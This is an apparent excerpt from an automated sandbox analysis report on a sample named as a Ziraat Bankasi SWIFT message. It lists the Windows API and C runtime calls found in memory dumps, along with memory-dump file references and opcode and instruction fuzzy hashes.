                                                                                                                                                        • Opcode Fuzzy Hash: 5eb2aae7a9647d9e2c45f82c1b7c95c0f5ecba5966e3f1c76f424d9cb9e516ac
                                                                                                                                                        • Instruction Fuzzy Hash: B6F0F47154024CABDB60DFE0DC49FEE77BDBF44701F508519FB199A180DA7495089B61
                                                                                                                                                        APIs
                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 000CC72F
                                                                                                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000CC746
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Temp$FileNamePath
                                                                                                                                                        • String ID: aut
                                                                                                                                                        • API String ID: 3285503233-3010740371
                                                                                                                                                        • Opcode ID: a24610ec369cb9c4e558ef89da5a9f19e91dbfc9f328696aea24fc31475d8067
                                                                                                                                                        • Instruction ID: db001542a56d88e35cde297b4b74ea84c51ed6bda58c16b166263140b650f4c2
                                                                                                                                                        • Opcode Fuzzy Hash: a24610ec369cb9c4e558ef89da5a9f19e91dbfc9f328696aea24fc31475d8067
                                                                                                                                                        • Instruction Fuzzy Hash: 22D05E7150030EABDB10AB90EC0EF8A776C9700708F0041A0B690A50B1DBF4E6D98B54
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00085022
                                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000850CB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: IconNotifyShell__memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 928536360-0
                                                                                                                                                        • Opcode ID: 19c8b420fae34f0d12cb5cda5d84316a114200373d2ceb3ba70e2ec27dddd311
                                                                                                                                                        • Instruction ID: ec9e2fcfe38d0c607c5fda8705c0564f36506b7f5c3cbf78ccd266adbec244fb
                                                                                                                                                        • Opcode Fuzzy Hash: 19c8b420fae34f0d12cb5cda5d84316a114200373d2ceb3ba70e2ec27dddd311
                                                                                                                                                        • Instruction Fuzzy Hash: 41319AB05047019FC761EF64D84469BBBE8FB49309F00092EF6DA83651E771A984CB92
                                                                                                                                                        APIs
                                                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 000A3973
                                                                                                                                                          • Part of subcall function 000A81C2: __NMSG_WRITE.LIBCMT ref: 000A81E9
                                                                                                                                                          • Part of subcall function 000A81C2: __NMSG_WRITE.LIBCMT ref: 000A81F3
                                                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 000A397A
                                                                                                                                                          • Part of subcall function 000A821F: GetModuleFileNameW.KERNEL32(00000000,00140312,00000104,00000000,00000001,00000000), ref: 000A82B1
                                                                                                                                                          • Part of subcall function 000A821F: ___crtMessageBoxW.LIBCMT ref: 000A835F
                                                                                                                                                          • Part of subcall function 000A1145: ___crtCorExitProcess.LIBCMT ref: 000A114B
                                                                                                                                                          • Part of subcall function 000A1145: ExitProcess.KERNEL32 ref: 000A1154
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1372826849-0
                                                                                                                                                        • Opcode ID: a7549139f2b7efcf00e6df442413624a757e883a739b6ded7e8fb1e940f49e76
                                                                                                                                                        • Instruction ID: e27c56bde48800bd1663ee13a47f7b13eab6c62a0bee39abf1a08d6c3e4fec4f
                                                                                                                                                        • Opcode Fuzzy Hash: a7549139f2b7efcf00e6df442413624a757e883a739b6ded7e8fb1e940f49e76
                                                                                                                                                        • Instruction Fuzzy Hash: DA01B5353453019AE6623BE9EC46BAF33889F87764F215129F5099B593DFB09D4086A0
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,000CC385,?,?,?,?,?,00000004), ref: 000CC6F2
                                                                                                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000CC385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 000CC708
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,000CC385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 000CC70F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3397143404-0
                                                                                                                                                        • Opcode ID: 04ec30873821734d836ce366889fea76001122a13b1b46c581be810e0ab41ece
                                                                                                                                                        • Instruction ID: d7e70f7840c2129b373f55f822a9b43c6a6bc92a0da0a66cc4332d110a120c8c
                                                                                                                                                        • Opcode Fuzzy Hash: 04ec30873821734d836ce366889fea76001122a13b1b46c581be810e0ab41ece
                                                                                                                                                        • Instruction Fuzzy Hash: 6FE08632140214B7E7211B94FC09FCE7F58EB05760F104210FB54690E097F125518798
                                                                                                                                                        APIs
                                                                                                                                                        • _free.LIBCMT ref: 000CBB72
                                                                                                                                                          • Part of subcall function 000A1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,000A7A85), ref: 000A1CB1
                                                                                                                                                          • Part of subcall function 000A1C9D: GetLastError.KERNEL32(00000000,?,000A7A85), ref: 000A1CC3
                                                                                                                                                        • _free.LIBCMT ref: 000CBB83
                                                                                                                                                        • _free.LIBCMT ref: 000CBB95
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                        • Opcode ID: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                                                                                                                                        • Instruction ID: d64c8a0b979c0af5c4737ccf97b1a01b5ace2ffe5070116dc95d19739a6e9bf7
                                                                                                                                                        • Opcode Fuzzy Hash: 39668004364d473340041393840801021218cf000de486f58b9632bd51e5be2b
                                                                                                                                                        • Instruction Fuzzy Hash: 64E0C7B160070082CA20A6B8AE4AFFB23CC0F05321F04080EB429E3183CF60EC4088B8
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME), ref: 00082303
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000825A1
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00082618
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 000F503A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3815369404-0
                                                                                                                                                        • Opcode ID: 3c76a914a95834270e542ffc078179ab1c76b0b23579024a9c3f7333a0f07f49
                                                                                                                                                        • Instruction ID: b7d91fa9070f615a1ab30ed42d858544ddbdc26978862105c1dfb59416341604
                                                                                                                                                        • Opcode Fuzzy Hash: 3c76a914a95834270e542ffc078179ab1c76b0b23579024a9c3f7333a0f07f49
                                                                                                                                                        • Instruction Fuzzy Hash: 5271BFBC941381ABC704EF6AE990895BBA4FB5B3547A0462ED15AD7FB2DBB044C0CF14
                                                                                                                                                        APIs
                                                                                                                                                        • ___lock_fhandle.LIBCMT ref: 000AEA29
                                                                                                                                                        • __close_nolock.LIBCMT ref: 000AEA42
                                                                                                                                                          • Part of subcall function 000A7BDA: __getptd_noexit.LIBCMT ref: 000A7BDA
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1046115767-0
                                                                                                                                                        • Opcode ID: bbef7f58fe990f28d3338c0e76570c23c80a43de59de7c61edd78a3e3ea752cf
                                                                                                                                                        • Instruction ID: 7b291e2ffce530af1229953d410b2cec165f5030bd4ee9b7742a459dace4fcf9
                                                                                                                                                        • Opcode Fuzzy Hash: bbef7f58fe990f28d3338c0e76570c23c80a43de59de7c61edd78a3e3ea752cf
                                                                                                                                                        • Instruction Fuzzy Hash: 1811A9725056909AD722BFE4D84139D7AA16F53331F1A4344E4345F1F3CBB49C4186A2
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000A395C: __FF_MSGBANNER.LIBCMT ref: 000A3973
                                                                                                                                                          • Part of subcall function 000A395C: __NMSG_WRITE.LIBCMT ref: 000A397A
                                                                                                                                                          • Part of subcall function 000A395C: RtlAllocateHeap.NTDLL(00CE0000,00000000,00000001,00000001,00000000,?,?,0009F507,?,0000000E), ref: 000A399F
                                                                                                                                                        • std::exception::exception.LIBCMT ref: 0009F51E
                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0009F533
                                                                                                                                                          • Part of subcall function 000A6805: RaiseException.KERNEL32(?,?,0000000E,00136A30,?,?,?,0009F538,0000000E,00136A30,?,00000001), ref: 000A6856
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3902256705-0
                                                                                                                                                        • Opcode ID: 2b2258856f8489bbd65cda828ec6fa2548e201c107ff5f8dcdda13efb0adf166
                                                                                                                                                        • Instruction ID: 9a9e2dbede099a573167f699652dfab7935202a5fb7172ab5298a13c5f9c6dc2
                                                                                                                                                        • Opcode Fuzzy Hash: 2b2258856f8489bbd65cda828ec6fa2548e201c107ff5f8dcdda13efb0adf166
                                                                                                                                                        • Instruction Fuzzy Hash: 59F0AF3110421EA7DB05BFDCE9019EE77ECAF01354F648125FA48E6182DFF19644A6A6
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        • __lock_file.LIBCMT ref: 000A3629
                                                                                                                                                          • Part of subcall function 000A4E1C: __lock.LIBCMT ref: 000A4E3F
                                                                                                                                                        • __fclose_nolock.LIBCMT ref: 000A3634
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                                        • Opcode ID: 42fa88f88efc46588de515c63279d6df9e083c3d4586dc689108a91ba71c67ad
                                                                                                                                                        • Instruction ID: b72dfd8c347d944229b264819b40c291079215760c8972ba787484c7c53810dc
                                                                                                                                                        • Opcode Fuzzy Hash: 42fa88f88efc46588de515c63279d6df9e083c3d4586dc689108a91ba71c67ad
                                                                                                                                                        • Instruction Fuzzy Hash: EEF09031901604AAD721AFE588027AEBAE06F53330F29C208F424AB2C2CB788A419E55
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00E40320: GetFileAttributesW.KERNELBASE(?), ref: 00E4032B
                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00E40C03
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1260398553.0000000000E3F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E3F000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_e3f000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesCreateDirectoryFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3401506121-0
                                                                                                                                                        • Opcode ID: 5724009b8e139447e09ab31a97541fce056115d539350b32bc65241ad9737dff
                                                                                                                                                        • Instruction ID: ac6be959964095b9dffc5f096131bcbf7e24d78a09c1ab5797219990d8557794
                                                                                                                                                        • Opcode Fuzzy Hash: 5724009b8e139447e09ab31a97541fce056115d539350b32bc65241ad9737dff
                                                                                                                                                        • Instruction Fuzzy Hash: 3151A531A11208D7DF14EFA0D854BEFB379EF58300F109568AA09F7290EB799B45CB65
                                                                                                                                                        APIs
                                                                                                                                                        • __flush.LIBCMT ref: 000A2A0B
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __flush__getptd_noexit
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4101623367-0
                                                                                                                                                        • Opcode ID: 2c995f787f38fa14e512786b2520d42173e1a585f10c25489fac9dfc8255258b
                                                                                                                                                        • Instruction ID: aecdb666244182427ced0dfcc08f8af6708c3108154cb1694f1c4d0832a8a0a3
                                                                                                                                                        • Opcode Fuzzy Hash: 2c995f787f38fa14e512786b2520d42173e1a585f10c25489fac9dfc8255258b
                                                                                                                                                        • Instruction Fuzzy Hash: B1418D31600706AFDB688FEDC8805AF7BE6AF56760F24863DE855C7241EA709D818B41
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                        • Opcode ID: 98affbed7af324c9d6ee0f4f2a2251ddaea5954a9c3f026677167e3f7d8d9bee
                                                                                                                                                        • Instruction ID: f38b01f070c7cdb0f9c53b4048a397e74a0afe48e4517a2c5d36c21182adfb72
                                                                                                                                                        • Opcode Fuzzy Hash: 98affbed7af324c9d6ee0f4f2a2251ddaea5954a9c3f026677167e3f7d8d9bee
                                                                                                                                                        • Instruction Fuzzy Hash: 1A31E470A01145DBDB58DF18C480A6DFBE6FF49340B6486A5E40ACB256DB31EDC1EB80
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00084214: FreeLibrary.KERNEL32(00000000,?), ref: 00084247
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000839FE,?,00000001), ref: 000841DB
                                                                                                                                                          • Part of subcall function 00084291: FreeLibrary.KERNEL32(00000000), ref: 000842C4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$Free$Load
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2391024519-0
                                                                                                                                                        • Opcode ID: 647716d1d92dc94049b58e9e8633b00d1132e69aefad31842fd5055c402b8950
                                                                                                                                                        • Instruction ID: bfd29e42491787cec0af58bd4dd71f9f92c619a8bc75460b79118f4349021a3c
                                                                                                                                                        • Opcode Fuzzy Hash: 647716d1d92dc94049b58e9e8633b00d1132e69aefad31842fd5055c402b8950
                                                                                                                                                        • Instruction Fuzzy Hash: 8111A331604207ABDB20FB74DC06FEE77E9BF40700F508429F9D6A61C2EB749A059B60
                                                                                                                                                        APIs
                                                                                                                                                        • ___lock_fhandle.LIBCMT ref: 000AAFC0
                                                                                                                                                          • Part of subcall function 000A7BDA: __getptd_noexit.LIBCMT ref: 000A7BDA
                                                                                                                                                          • Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1144279405-0
                                                                                                                                                        • Opcode ID: ad111cd0e04cd976c0c4c3d86e855d1cad98ae5e45573e6167978809f22ab5ed
                                                                                                                                                        • Instruction ID: f099114f0e6d3eb11d1a6fd57b24ec32d64fd82a46d3744c831cf6354c543a3e
                                                                                                                                                        • Opcode Fuzzy Hash: ad111cd0e04cd976c0c4c3d86e855d1cad98ae5e45573e6167978809f22ab5ed
                                                                                                                                                        • Instruction Fuzzy Hash: 32119D729056009FD7226FE4DC06B9E3AA0AF43331F1A8250E5381F1E3CBB589408BA1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        • Opcode ID: daa29a418462963be006df0018d3ea545f1b1bfa4cb5ec5a6529a35093eb270d
                                                                                                                                                        • Instruction ID: 2b028c14c250f5b688a075ce86c31f1d89e9aa9c5059bd3cf63bee65855742c3
